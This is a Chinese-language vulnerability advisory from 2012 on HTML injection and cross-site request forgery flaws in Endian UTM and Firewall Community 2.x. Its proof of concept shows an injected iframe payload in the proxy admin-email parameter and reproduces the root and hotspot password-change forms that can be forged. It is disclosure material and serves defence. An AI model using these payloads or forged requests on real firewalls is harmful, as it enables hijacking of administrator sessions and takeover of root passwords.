Endian UTM Firewall跨站请求伪造和HTML注入漏洞


发布日期:2012-03-01
更新日期:2012-03-05

受影响系统:
endian Endian Firewall Community  2.x
endian UTM Software Appliance 2.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 52263

Endian Firewall可提供路由/防火墙和统一威胁管理的开源GNU/Linux发行版。

Endian UTM Software Appliance和Endian Firewall Community在实现上存在多个漏洞,通过"PROXY_PORT"、"VISIBLE_HOSTNAME"和"ADMIN_MAIL_ADDRESS"参数输入到gi-bin/proxyconfig.cgi时没有正确过滤,可造成在受影响站点用户浏览器中执行HTML和脚本代码。

<*来源:Benjamin Kunz Mejri
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Benjamin Kunz Mejri ()提供了如下测试方法:

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers with high required user inter action or local low privileged user accounts.
For demonstration or reproduce ...

1.1
Example Code Review: Input Validation Vulnerabilities (Persistent Inject)

Server: demo.endian.com/
Path: /cgi-bin/
File: proxyconfig.cgi

<div id="page-content-box"> <div id="notification-view" class="spinner" style="display:none"></div>
<div id="module-content">
<script type="text/javascript">
$(document).ready(function() {
/* Enable visualization of service notifications */
display_notifications(["squid","dansguardian","havp","sarg"], {"startMessage": "Proxy settings are being
applied. Please hold...","updateContent": ".service-switch-form","type": "observe","endMessage": "Proxy settings have been
applied successfully.","interval": "500"});
})
</script>
<div class="error-fancy" style="width: 504px; ">
<div class="content">
<table cellpadding="0" cellspacing="0" border="0">
<tr>

<td class="sign" valign="middle"><img src="/images/bubble_red_sign.png" alt="" border="0" /></td>
<td class="text" valign="middle">">"<iframe src=http://vulnerability-lab.com width=600 height=600>@aollamer.de"
at "Email used for notification (cache admin)" is not valid!(or?@rem0ve)<br /></td>
</tr>
</table>
</div>


Reference(s):
https://www.example.com/cgi-bin/proxyconfig.cgi
https://www.example.com/cgi-bin/hosts.cgi
https://www.example.com/cgi-bin/dhcp.cgi

 

1.2
Example Code Review: Cross Site Request Forgery Vulnerabilities (Non-Persistent)

Server: demo.endian.com/
Path: /cgi-bin/
File: hotspot-changepw.cgi or changepw.cgi

<form action="/cgi-bin/changepw.cgi" method="post">
<div class="section first multi-column">
<input type='hidden' name='ACTION_ROOT' value='save' />
<div class="title"><h2 class="title">SSH Password (root)</h2></div>
<div class="fields-row">
<span class="multi-field">
<label id="username_field" for="username">Password *</label>

<input type="password" name="ROOT_PASSWORD1" SIZE="5" /></span>

... or

<form enctype='multipart/form-data' method='post' action='/cgi-bin/hotspot-changepw.cgi'>
<input type='hidden' name='ACTION_HOTSPOT' value='save' />
<table width='100%'>

<tr>
<td width='15%' class='base'>Password:</td>
<td width='30%'><input type='password' name='HOTSPOT_PASSWORD1' /></td>
<td width='15%' class='base'>Again:</td>
<td width='30%'><input type='password' name='HOTSPOT_PASSWORD2' /></td>
<td width='10%'><input class='submitbutton' type='submit' name='submit' value='Save' /></td>
</tr>
</table>
</form>


References:
https://www.example.com/cgi-bin/changepw.cgi
https://www.example.com/cgi-bin/hotspot-changepw.cgi
http://www.bkjia.com

建议:
--------------------------------------------------------------------------------
厂商补丁:

endian
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.endian.com

相关内容

    暂无相关文章